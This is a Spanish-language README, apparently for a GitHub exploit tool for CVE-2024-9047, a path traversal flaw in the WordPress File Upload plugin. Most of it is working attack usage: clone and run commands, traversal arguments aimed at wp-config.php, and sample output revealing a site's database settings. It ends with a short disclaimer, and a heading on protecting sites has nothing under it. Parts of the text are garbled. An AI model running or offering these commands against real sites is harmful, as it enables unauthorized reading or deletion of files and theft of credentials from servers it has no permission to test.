
Exploit para WordPress File Upload Plugin: todas las versiones hasta la 4.24.11 son vulnerables.
El plugin WordPress File Upload para WordPress es vulnerable a una vulnerabilidad de Path Traversal en todas las versiones hasta la 4.24.11, inclusive, a través del archivo wfu_file_downloader.php. Esta vulnerabilidad permite a atacantes no autenticados leer o eliminar archivos fuera del directorio previsto. La explotación exitosa requiere que la instalación de WordPress objetivo esté ejecutando PHP 7.4 o anterior.
Un atacante puede explotar esta vulnerabilidad creando una solicitud específica al endpoint vulnerable, wfu_file_downloader.php, y manipulando el parámetro de ruta de archivo para obtener acceso no autorizado a archivos sensibles en el servidor.
4.24.11 o anterior).7.4 o anterior.Clona este repositorio:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Instala las dependencias de Python (si es necesario):
pip install requests
Ejecuta el script para comprobar la versión del plugin y explotar la vulnerabilidad:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
Para explotar la configuración vulnerable por defecto y leer el archivo de configuración de WordPress:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Para proteger tu sitio WordPress:
Este código está destinado únicamente a fines educativos y de investigación. El uso no autorizado de este script en sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético. Los autores no asumen ninguna responsabilidad por el mal uso de este código.